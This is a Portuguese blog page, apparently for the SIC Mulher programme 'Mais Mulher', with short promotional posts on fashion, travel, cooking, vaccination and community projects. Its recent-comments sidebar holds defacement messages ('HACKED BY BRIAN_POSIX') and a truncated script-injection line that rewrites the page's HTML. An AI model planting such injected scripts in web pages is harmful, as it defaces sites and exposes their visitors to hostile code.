Apresentador, fotógrafo, maquiador, consultor de estilo e consultor estratégico de O Boticário.

 

Fernando Torquatto é o que se pode chamar de profissional completo, polivalente e que alia toda a sua expertise nas múltiplas especialidades do seu dia-a-dia. Numa paixão que começou na infância, o santista “queridinho das estrelas” não precisa provar mais nada. São mais de 15 anos de carreira e, definitivamente, ele chegou para ficar.

 


Tags:

Barbara Oliveira representa Portugal nos dez finalistas do Biggest Baddest Bucket List, concurso global de My Destination.


Lançado no fim de Janeiro pelo My Destination, o Biggest Baddest Bucket List alcançou mais de 1400 pessoas inscritas, todas em busca de um único objetivo: a conquista da viagem dos sonhos. O vencedor viajará por seis meses pelo globo para os locais que desejar, a fazer reportagens de vídeo para o My Destination, com todas as despesas pagas, e levará ainda um prémio de $50,000.

Os participantes criaram as suas candidaturas por vídeo, apresentando os seus destinos favoritos em todo o planeta e aguardaram ansiosamente até ao dia 15 de Abril, quando finalmente foram divulgados os 10 finalistas, com um resultado agradável para os portugueses.


Agora, Barbara aguarda o dia 18 de maio, quando viajar para Londres para uma semana cheia de desafios e entrevistas. No dia 24 de maio, finalmente, o júri britânico Ben Southall, vencedor do concurso para “o melhor emprego do mundo” em 2009, anunciará o vencedor final do Biggest Baddest Bucket List. Entretanto, a Barbara precisa do vosso apoio – quanto mais apoio tiverem, melhores hipóteses terão de ganhar. Podem apoiá –la aqui:

http://www.mydestination.com/users/barbaraoliveira/bbb#tab

 

Por isso não deixe de apoiar, e não perca o Mais Mulher desta segunda-feira, às 17:30 na SIC Mulher!


Tags:

No seguimento do sucesso das edições anteriores no âmbito da iniciativa “FC art – when fashion meets art”, a Fashion Clinic volta a abrir as suas portas para receber um novo site specific, desta feita da autoria do artista plástico Julião Sarmento.


A intervenção levada a cabo pelo artista materializou-se na criação de uma t-shirt de edição limitada a 300 exemplares, numerada e assinada. Para este site specific, o artista desafiou 39 mulheres a posarem individualmente, com essa mesma t-shirt, numa produção fotográfica. Figuras públicas, jornalistas, artistas e empresárias fazem parte da seleção de personalidades que aceitaram o desafio e aderiram a esta iniciativa. As fotografias estarão expostas na loja de senhora Fashion Clinic entre Março e Junho deste ano.

 

E no Mais Mulher desta quarta-feira iremos revelar tudo sobre esta oportunidade! Às 17:30 na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 



O Learnclube trata-se de uma marca que organiza e promove programas diversificados para férias de Verão de crianças e jovens em Inglaterra, EUA e Irlanda com uma forte componente de formação aliada ao puro laser.

Todos os programas têm como denominador comum, Aprender e Melhorar o Inglês e depois cada programa conjuga um foco de interesse do participante que poderá ir desde praticar desporto, cultural, de puro convívio e interação com outras nacionalidades, artístico, de pura formação e preparação à Universidade, ou outro.

Por isso não perca este conceito cultural, no Mais Mulher desta segunda-feira, às 17:30 na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 



A idade é o principal fator de risco para se contrair uma doença invasiva pneumocócica. Se nos vacinarmos, estamos a reduzir drasticamente o risco de doença.


E para que a proteção seja eficaz, é fundamental cumprir o esquema de vacinação.

 

Por isso não perca o Mais Mulher desta quinta-feira, às 17:30 na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 




Tags:

Pensada como uma ferramenta de evolução na pastelaria, tem conseguido ao longo destes anos passar ensinamentos das varias áreas da pastelaria, desde o chocolate, bombons, entremeios e semifrios, açúcar, gelados, etc…
Tendo mesmo realizado já  alguns cursos noutras áreas, como a utilização das Texturas El Bulli na cozinha.

Tendo como responsável técnico e formador o chefe António Melgão não deixamos no entanto de dar formação com outros chefes, alguns portugueses e outros estrangeiros, nomeadamente espanhóis e franceses.

 

E no Mais Mulher desta quarta-feira, António Melgão traz-lhe alguns exemplos do que melhor se faz com chocolate!

Um programa a não perder, esta quarta-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 



Nesta proposta para uma mesa de Páscoa, exploram-se dois conceitos estruturantes. Por um lado proponho uma mesa realizada exclusivamente com produtos nacionais e por outro lado explora-se a participação activa das crianças na elaboração de uma mesa de festa.

Para além dos produtos utilizados serem exclusivamente nacionais, procurei a criação de uma mesa de fácil e rápida materialização. Os tecidos propostos são da Multitecidos, vendidos directamente ao público e com a possibilidade de serem comprados e com entrega imediata. Também a execução das almofadas e toalha pode ser realizada em Campo de Ourique na Cadeirinha do Almeida. Uma manhã de centro comercial que resolve a aquisição e confecção desta decoração.

Relativamente ao serviço de pratos, ambas as propostas recaíram sobre produtos nacionais facilmente adquiríveis na Vista Alegre e com entrega imediata. Temos de facto produtos de qualidade excepcional em Portugal e com a grande vantagem de não necessitarmos de aguardar meses pela entrega daquilo que compramos. Também em Campo de Ourique, no João Lopes, foi mandada fazer a base deste candeeiro com a particularidade de ter o mesmo tecido da toalha. Este tecido pode ser trocado por outro, sem comprometer a peça. E claro que não poderiam deixar de existir nesta mesa, elementos da Loja do Querido, que fica no Bairro Alto e tem peças com cores de primavera muito adequadas a uma mesa de festa descontraída e colorida. O abat- jour é feito com um padrão, também disponível como papel de parede, e o tamborete é sempre uma excelente opção para sentar mais um convidado.

 

Por isso já sabe! Não perca todas estas dicas e novidades no Mais Mulher desta terça-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 





O Projeto Comunidades, dinamizado pelo Chapitô em parceria com a SIC Esperança insere a sua tónica na participação e no envelhecimento ativo, visando a exploração de competências de cerca de 300 utentes divididos por 10 instituições de solidariedade social nos concelhos de Lisboa e Oeiras, através de um conjunto de dinâmicas pensadas, relativamente, à adequabilidade das faixas etárias.

O Projeto divide-se em três eixos de intervenção: o envelhecimento ativo, a participação e a integração e em três etapas: a primeira centra-se no reconhecimento territorial institucional, na descoberta dos universos e gostos individuais de cada utente inserido num coletivo, assim como, na construção de relações de empatia, comunicação e confiança.

A segunda etapa, onde atualmente a equipa de intervenção se encontra, articula-se com o desenvolvimento e aprendizagem de dinâmicas relacionadas com a temática do teatro, canto e vivências experienciadas outrora. Nesta etapa, além da componente formativa da ação, a equipa visa a preparação e construção de uma estrutura final a ser apresentada, pelos utentes, à instituição, famílias e possíveis instituições parceiras, envolvendo o todo na criação de um laço em comunidade.

A terceira etapa articula-se com a fase de implementação de projeto, em que, os utentes constroem uma intervenção final (espetáculo), que tem como propósito colocar as competências e saberes em prol do princípio da efetivação da participação e cidadania ativas.

Em todas as instituições em que a equipa Chapitô intervém nota-se um profundo crescimento dos utentes ao nível das dinâmicas realizadas, tais como, esculturas de balões (sendo uma experiência nova, a adesão foi completa, tornando-se num instrumento ótimo de trabalho), magia e dinâmicas vocais, musicais e teatrais. Além de obter uma adesão total por parte dos utentes, as reações das responsáveis institucionais são sempre construtivas e de confiança total.

Do ponto de vista metodológico, o projeto visa também promover a autonomia quer dos utentes na sua representação institucional, quer das próprias instituições, inovando socialmente no tipo de respostas, mais adequadas que promovam os princípios gerais, neste caso do projeto: - envelhecimento ativo, participação e integração.

 

Não perca este projeto tão especial que visa pelo desenvolvimento de toda a sociedade!

No Mais Mulher desta segunda-feira às 17:330 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 



A Popota, tal como todas as Divas, tem o seu estilista de eleição, o criador Nuno Gama.
Pela primeira vez na sua carreira, e no ano em que assinala 20 anos de carreira, Nuno Gama veste a “Diva”, a Popota.
É oficial, Nuno Gama é mesmo o estilista da Diva Popota.

Na último dia da Moda Lisboa 2013, Nuno Gama e Popota surpreenderam todos com a novidade, o reconhecido criador de moda masculina Nuno Gama é o estilista da Diva, que o considera um criador cujas coleções e inspirações nos símbolos nacionais vão ao encontro da sua própria personalidade, sofisticada, moderna, elegante e sensual, glamourosa e dinâmica…

Seguindo as tendências, a Popota está sempre na vanguarda, apresentando-se como uma das mais bem vestidas em todos os eventos a que comparece.
Num deslumbrante vestido de cetim prata by Nuno Gama, a Diva Popota chegou à Moda Lisboa de cadillac com o seu motorista e a sua personal assistant e assistiu na 1ª fila ao desfile da coleção do seu estilista de eleição.

Na sala do desfile a Popota foi fotografada por um batalhão de fotógrafos com inúmeras figuras públicas que posaram ao lado da Diva, como as atrizes Sofia Ribeiro e Sílvia Rizzo, os irmãos Delgado, os socialite Lili Caneças, José Castelo Branco e Betty Grafstein, entre outros.

Mais que uma celebridade, a Popota é uma Diva. E uma Diva tem o seu estilista de eleição, só SEU. Nuno Gama, enquanto criador de moda apenas para homem, vai criar exclusivamente para a sua única Diva, a Popota.

Com uma imagem pensada ao pormenor, a Diva Popota está sempre elegante e glamourosa num look by Nuno Gama adequado a cada evento onde marque presença.

Para os fotógrafos é sempre um prazer fotografar a DIVA!

 

Curiosa!?! Então não perca o Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:

Nada melhor que um presente original neste dia que se avizinha!


E todos nós temos dúvidas em relação ao melhor presente a oferecer! Mas como o que interessa é proporcionar boas surpresas, as sugestões criativas que lhe trazemos esta quarta-feira vão mexer consigo! Até porque são os gadjets do momento, e ainda, por cima, divertidos!


Não perca nada, no Mais Mulher da SIC Mulher, às 17:30!

 

E se não viu. Veja o vídeo aqui!

 




Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO